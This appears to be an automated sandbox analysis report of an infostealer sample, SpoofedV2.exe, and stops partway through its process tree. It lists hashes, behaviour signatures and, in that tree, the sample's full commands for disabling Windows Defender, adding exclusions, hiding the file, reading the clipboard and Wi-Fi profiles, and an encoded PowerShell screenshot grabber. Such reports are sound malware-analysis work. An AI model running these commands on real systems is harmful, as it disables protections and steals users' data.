Analysis
-
max time kernel
7s -
max time network
13s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-11-2024 23:32
Behavioral task
behavioral1
Sample
SpoofedV2.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SpoofedV2.exe
Resource
win10v2004-20241007-en
General
-
Target
SpoofedV2.exe
-
Size
6.8MB
-
MD5
556038beb43df49b75588cb5c2ffa36a
-
SHA1
c7307a9fdbaaeeb9e541949732d0fafad797751d
-
SHA256
b53e28e78d268e2b6fc34fe9ec8e3b3a9351033698bada9d9b3f4a66cba6b928
-
SHA512
a9d05f5ba2b27452e541ae67a2709db3a365530f8cf112e4977561c8c0ca77fa44ee607975a29d2fd0305143d1652c9f5c3b539503ad6ac43a84fab44c1a93ca
-
SSDEEP
98304:lQBkwN+MdA5wqSnWB8MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DovaDJ1n6hB02:lmV1vTB6ylnlPzf+JiJCsmFMvln6hqgP
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 4588 powershell.exe 4480 powershell.exe 2188 powershell.exe 4448 powershell.exe 4468 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeSpoofedV2.exeattrib.exedescription ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts SpoofedV2.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid Process 3936 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
SpoofedV2.exepid Process 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe 1008 SpoofedV2.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 24 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid Process 1804 tasklist.exe 4864 tasklist.exe 3040 tasklist.exe 4740 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
-
Processes:
resource yara_rule behavioral2/files/0x000a000000023b8e-21.dat upx behavioral2/memory/1008-25-0x00007FFD35E50000-0x00007FFD3643A000-memory.dmp upx behavioral2/files/0x000a000000023b8c-29.dat upx behavioral2/memory/1008-30-0x00007FFD45E80000-0x00007FFD45EA3000-memory.dmp upx behavioral2/memory/1008-32-0x00007FFD4C150000-0x00007FFD4C15F000-memory.dmp upx behavioral2/files/0x000a000000023b80-28.dat upx behavioral2/files/0x000a000000023b87-48.dat upx behavioral2/files/0x000a000000023b86-47.dat upx behavioral2/files/0x000a000000023b85-46.dat upx behavioral2/files/0x000a000000023b84-45.dat upx behavioral2/files/0x000a000000023b83-44.dat upx behavioral2/files/0x000a000000023b82-43.dat upx behavioral2/files/0x000a000000023b81-42.dat upx behavioral2/files/0x000a000000023b7f-41.dat upx behavioral2/files/0x000b000000023b93-40.dat upx behavioral2/files/0x000b000000023b92-39.dat upx behavioral2/files/0x000a000000023b91-38.dat upx behavioral2/files/0x000a000000023b8d-35.dat upx behavioral2/files/0x000a000000023b8a-34.dat upx behavioral2/memory/1008-54-0x00007FFD457D0000-0x00007FFD457FD000-memory.dmp upx behavioral2/memory/1008-56-0x00007FFD45B20000-0x00007FFD45B39000-memory.dmp upx behavioral2/memory/1008-58-0x00007FFD45330000-0x00007FFD45353000-memory.dmp upx behavioral2/memory/1008-60-0x00007FFD35700000-0x00007FFD3586F000-memory.dmp upx behavioral2/memory/1008-62-0x00007FFD450C0000-0x00007FFD450D9000-memory.dmp upx behavioral2/memory/1008-64-0x00007FFD46500000-0x00007FFD4650D000-memory.dmp upx behavioral2/memory/1008-66-0x00007FFD45090000-0x00007FFD450BE000-memory.dmp upx behavioral2/memory/1008-71-0x00007FFD35640000-0x00007FFD356F8000-memory.dmp upx behavioral2/memory/1008-70-0x00007FFD35E50000-0x00007FFD3643A000-memory.dmp upx behavioral2/memory/1008-74-0x00007FFD45E80000-0x00007FFD45EA3000-memory.dmp upx behavioral2/memory/1008-73-0x00007FFD352C0000-0x00007FFD35635000-memory.dmp upx behavioral2/memory/1008-84-0x00007FFD457D0000-0x00007FFD457FD000-memory.dmp upx behavioral2/memory/1008-83-0x00007FFD351A0000-0x00007FFD352BC000-memory.dmp upx behavioral2/memory/1008-82-0x00007FFD45C70000-0x00007FFD45C7D000-memory.dmp upx behavioral2/memory/1008-81-0x00007FFD45070000-0x00007FFD45084000-memory.dmp upx behavioral2/memory/1008-80-0x00007FFD4C150000-0x00007FFD4C15F000-memory.dmp upx behavioral2/memory/1008-169-0x00007FFD45330000-0x00007FFD45353000-memory.dmp upx behavioral2/memory/1008-233-0x00007FFD35700000-0x00007FFD3586F000-memory.dmp upx behavioral2/memory/1008-256-0x00007FFD450C0000-0x00007FFD450D9000-memory.dmp upx behavioral2/memory/1008-273-0x00007FFD45090000-0x00007FFD450BE000-memory.dmp upx behavioral2/memory/1008-294-0x00007FFD35640000-0x00007FFD356F8000-memory.dmp upx behavioral2/memory/1008-296-0x00007FFD352C0000-0x00007FFD35635000-memory.dmp upx behavioral2/memory/1008-303-0x00007FFD35700000-0x00007FFD3586F000-memory.dmp upx behavioral2/memory/1008-311-0x00007FFD351A0000-0x00007FFD352BC000-memory.dmp upx behavioral2/memory/1008-297-0x00007FFD35E50000-0x00007FFD3643A000-memory.dmp upx behavioral2/memory/1008-298-0x00007FFD45E80000-0x00007FFD45EA3000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 4468 powershell.exe 4468 powershell.exe 4588 powershell.exe 4588 powershell.exe 4448 powershell.exe 4448 powershell.exe 4448 powershell.exe 4468 powershell.exe 4468 powershell.exe 4588 powershell.exe 4588 powershell.exe 2628 powershell.exe 2628 powershell.exe 4168 powershell.exe 4168 powershell.exe 4168 powershell.exe 2628 powershell.exe 4480 powershell.exe 4480 powershell.exe 3552 powershell.exe 3552 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exetasklist.exetasklist.exetasklist.exeWMIC.exepowershell.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 4468 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeDebugPrivilege 4448 powershell.exe Token: SeDebugPrivilege 4740 tasklist.exe Token: SeDebugPrivilege 1804 tasklist.exe Token: SeDebugPrivilege 4864 tasklist.exe Token: SeIncreaseQuotaPrivilege 2148 WMIC.exe Token: SeSecurityPrivilege 2148 WMIC.exe Token: SeTakeOwnershipPrivilege 2148 WMIC.exe Token: SeLoadDriverPrivilege 2148 WMIC.exe Token: SeSystemProfilePrivilege 2148 WMIC.exe Token: SeSystemtimePrivilege 2148 WMIC.exe Token: SeProfSingleProcessPrivilege 2148 WMIC.exe Token: SeIncBasePriorityPrivilege 2148 WMIC.exe Token: SeCreatePagefilePrivilege 2148 WMIC.exe Token: SeBackupPrivilege 2148 WMIC.exe Token: SeRestorePrivilege 2148 WMIC.exe Token: SeShutdownPrivilege 2148 WMIC.exe Token: SeDebugPrivilege 2148 WMIC.exe Token: SeSystemEnvironmentPrivilege 2148 WMIC.exe Token: SeRemoteShutdownPrivilege 2148 WMIC.exe Token: SeUndockPrivilege 2148 WMIC.exe Token: SeManageVolumePrivilege 2148 WMIC.exe Token: 33 2148 WMIC.exe Token: 34 2148 WMIC.exe Token: 35 2148 WMIC.exe Token: 36 2148 WMIC.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 4168 powershell.exe Token: SeIncreaseQuotaPrivilege 2148 WMIC.exe Token: SeSecurityPrivilege 2148 WMIC.exe Token: SeTakeOwnershipPrivilege 2148 WMIC.exe Token: SeLoadDriverPrivilege 2148 WMIC.exe Token: SeSystemProfilePrivilege 2148 WMIC.exe Token: SeSystemtimePrivilege 2148 WMIC.exe Token: SeProfSingleProcessPrivilege 2148 WMIC.exe Token: SeIncBasePriorityPrivilege 2148 WMIC.exe Token: SeCreatePagefilePrivilege 2148 WMIC.exe Token: SeBackupPrivilege 2148 WMIC.exe Token: SeRestorePrivilege 2148 WMIC.exe Token: SeShutdownPrivilege 2148 WMIC.exe Token: SeDebugPrivilege 2148 WMIC.exe Token: SeSystemEnvironmentPrivilege 2148 WMIC.exe Token: SeRemoteShutdownPrivilege 2148 WMIC.exe Token: SeUndockPrivilege 2148 WMIC.exe Token: SeManageVolumePrivilege 2148 WMIC.exe Token: 33 2148 WMIC.exe Token: 34 2148 WMIC.exe Token: 35 2148 WMIC.exe Token: 36 2148 WMIC.exe Token: SeDebugPrivilege 3040 tasklist.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeIncreaseQuotaPrivilege 4064 WMIC.exe Token: SeSecurityPrivilege 4064 WMIC.exe Token: SeTakeOwnershipPrivilege 4064 WMIC.exe Token: SeLoadDriverPrivilege 4064 WMIC.exe Token: SeSystemProfilePrivilege 4064 WMIC.exe Token: SeSystemtimePrivilege 4064 WMIC.exe Token: SeProfSingleProcessPrivilege 4064 WMIC.exe Token: SeIncBasePriorityPrivilege 4064 WMIC.exe Token: SeCreatePagefilePrivilege 4064 WMIC.exe Token: SeBackupPrivilege 4064 WMIC.exe Token: SeRestorePrivilege 4064 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SpoofedV2.exeSpoofedV2.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 1356 wrote to memory of 1008 1356 SpoofedV2.exe 83 PID 1356 wrote to memory of 1008 1356 SpoofedV2.exe 83 PID 1008 wrote to memory of 2140 1008 SpoofedV2.exe 87 PID 1008 wrote to memory of 2140 1008 SpoofedV2.exe 87 PID 1008 wrote to memory of 2356 1008 SpoofedV2.exe 88 PID 1008 wrote to memory of 2356 1008 SpoofedV2.exe 88 PID 1008 wrote to memory of 2972 1008 SpoofedV2.exe 89 PID 1008 wrote to memory of 2972 1008 SpoofedV2.exe 89 PID 1008 wrote to memory of 1324 1008 SpoofedV2.exe 90 PID 1008 wrote to memory of 1324 1008 SpoofedV2.exe 90 PID 1008 wrote to memory of 4444 1008 SpoofedV2.exe 91 PID 1008 wrote to memory of 4444 1008 SpoofedV2.exe 91 PID 2140 wrote to memory of 4448 2140 cmd.exe 97 PID 2140 wrote to memory of 4448 2140 cmd.exe 97 PID 2356 wrote to memory of 4588 2356 cmd.exe 98 PID 2356 wrote to memory of 4588 2356 cmd.exe 98 PID 4444 wrote to memory of 4468 4444 cmd.exe 99 PID 4444 wrote to memory of 4468 4444 cmd.exe 99 PID 1324 wrote to memory of 3136 1324 cmd.exe 100 PID 1324 wrote to memory of 3136 1324 cmd.exe 100 PID 1008 wrote to memory of 640 1008 SpoofedV2.exe 101 PID 1008 wrote to memory of 640 1008 SpoofedV2.exe 101 PID 1008 wrote to memory of 3768 1008 SpoofedV2.exe 102 PID 1008 wrote to memory of 3768 1008 SpoofedV2.exe 102 PID 2972 wrote to memory of 3160 2972 cmd.exe 105 PID 2972 wrote to memory of 3160 2972 cmd.exe 105 PID 640 wrote to memory of 4740 640 cmd.exe 106 PID 640 wrote to memory of 4740 640 cmd.exe 106 PID 1008 wrote to memory of 1276 1008 SpoofedV2.exe 108 PID 1008 wrote to memory of 1276 1008 SpoofedV2.exe 108 PID 1008 wrote to memory of 3848 1008 SpoofedV2.exe 107 PID 1008 wrote to memory of 3848 1008 SpoofedV2.exe 107 PID 3768 wrote to memory of 1804 3768 cmd.exe 109 PID 3768 wrote to memory of 1804 3768 cmd.exe 109 PID 1008 wrote to memory of 4688 1008 SpoofedV2.exe 112 PID 1008 wrote to memory of 4688 1008 SpoofedV2.exe 112 PID 1008 wrote to memory of 316 1008 SpoofedV2.exe 113 PID 1008 wrote to memory of 316 1008 SpoofedV2.exe 113 PID 1008 wrote to memory of 312 1008 SpoofedV2.exe 114 PID 1008 wrote to memory of 312 1008 SpoofedV2.exe 114 PID 1008 wrote to memory of 4484 1008 SpoofedV2.exe 117 PID 1008 wrote to memory of 4484 1008 SpoofedV2.exe 117 PID 1008 wrote to memory of 1612 1008 SpoofedV2.exe 120 PID 1008 wrote to memory of 1612 1008 SpoofedV2.exe 120 PID 1008 wrote to memory of 1112 1008 SpoofedV2.exe 119 PID 1008 wrote to memory of 1112 1008 SpoofedV2.exe 119 PID 312 wrote to memory of 4696 312 cmd.exe 125 PID 312 wrote to memory of 4696 312 cmd.exe 125 PID 4688 wrote to memory of 4864 4688 cmd.exe 126 PID 4688 wrote to memory of 4864 4688 cmd.exe 126 PID 1612 wrote to memory of 2628 1612 cmd.exe 127 PID 1612 wrote to memory of 2628 1612 cmd.exe 127 PID 3848 wrote to memory of 4168 3848 cmd.exe 128 PID 3848 wrote to memory of 4168 3848 cmd.exe 128 PID 1276 wrote to memory of 2148 1276 cmd.exe 129 PID 1276 wrote to memory of 2148 1276 cmd.exe 129 PID 1112 wrote to memory of 4432 1112 cmd.exe 170 PID 1112 wrote to memory of 4432 1112 cmd.exe 170 PID 316 wrote to memory of 5048 316 cmd.exe 141 PID 316 wrote to memory of 5048 316 cmd.exe 141 PID 4484 wrote to memory of 3684 4484 cmd.exe 132 PID 4484 wrote to memory of 3684 4484 cmd.exe 132 PID 1008 wrote to memory of 4972 1008 SpoofedV2.exe 133 PID 1008 wrote to memory of 4972 1008 SpoofedV2.exe 133 -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid Process 3136 attrib.exe 980 attrib.exe 3928 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SpoofedV2.exe"C:\Users\Admin\AppData\Local\Temp\SpoofedV2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\SpoofedV2.exe"C:\Users\Admin\AppData\Local\Temp\SpoofedV2.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpoofedV2.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SpoofedV2.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code 10x8', 0, 'Loader Failure', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error Code 10x8', 0, 'Loader Failure', 0+16);close()"4⤵PID:3160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\SpoofedV2.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\SpoofedV2.exe"4⤵
- Views/modifies file attributes
PID:3136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:5048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:312 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:4432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
